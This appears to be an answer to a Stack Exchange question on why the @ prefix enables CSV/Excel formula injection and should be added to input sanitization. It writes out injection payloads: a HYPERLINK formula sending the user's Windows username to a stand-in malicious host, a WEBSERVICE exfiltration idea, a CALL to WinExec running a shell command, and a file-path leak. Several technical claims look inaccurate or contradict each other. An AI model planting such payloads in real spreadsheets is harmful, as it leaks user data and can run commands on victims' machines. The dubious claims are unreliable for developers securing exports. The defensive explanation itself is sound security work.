关于@符号在Excel/CSV注入中的利用方式及防护检查必要性的技术问询
@ Symbol Enables Excel/CSV Injection Attacks Great question! Let’s break down exactly why the @ symbol is a risk in Excel/CSV injection attacks, and why it needs to be included in your input sanitization checks.
1. Excel’s Automatic Formula Parsing for @-Prefixed Content
In modern Excel (365/2021 and later), the @ symbol acts as the implicit intersection operator—used to pull a single value from an array range. When importing a CSV file, Excel treats any cell starting with @ as a potential formula component. Crucially, it will automatically prepend an = sign to convert the entry into a valid formula: for example, a CSV cell with @A1 becomes =@A1 in Excel, which references the value in cell A1.
2. Bypassing Basic Injection Filters
Many applications only sanitize inputs starting with =, +, or - to block CSV injection. Attackers exploit this gap by using @ as an alternative trigger for formula execution. Here are concrete examples of malicious uses:
- A CSV entry like
@HYPERLINK("https://malicious-site.com/steal?user="&ENVIRON("USERNAME"))gets converted to=@HYPERLINK(...)in Excel. When the user interacts with the cell (or Excel renders it), it sends a request to the malicious site, leaking the user’s Windows username. - Stealthier attacks might use
@SUM(INDEX(GET.WORKSPACE(13),1))to fetch the user’s system username, then embed that data in a hiddenWEBSERVICEcall to exfiltrate it.
3. Combining @ with High-Risk Excel Functions
The @ operator can be paired with powerful (and dangerous) Excel functions to execute harmful actions, even if your system blocks =, +, or -:
@CALL("kernel32.dll","WinExec","JJ","cmd /c calc.exe"): While this requires relaxed Excel security settings, it shows how@can initiate system command execution.@CELL("filename",A1): Retrieves the full path of the current workbook, which can be leaked via a malicious hyperlink.
Why Sanitizing @ Is Critical
- Filter Evasion: It’s a simple but effective way to bypass basic injection protection that only checks for
=,+,-. - Seamless Execution: Excel converts
@-prefixed cells to formulas automatically, no user action required—making attacks harder to spot. - Stealth:
@looks like a harmless, everyday symbol (think email addresses), so malicious entries are less likely to raise red flags with users or basic validation.
To mitigate this, add @ to your list of blocked prefixes, or escape it (e.g., prepend a single quote ' to force Excel to treat the cell as plain text instead of a formula).
内容的提问来源于stack exchange,提问作者Jeronimo

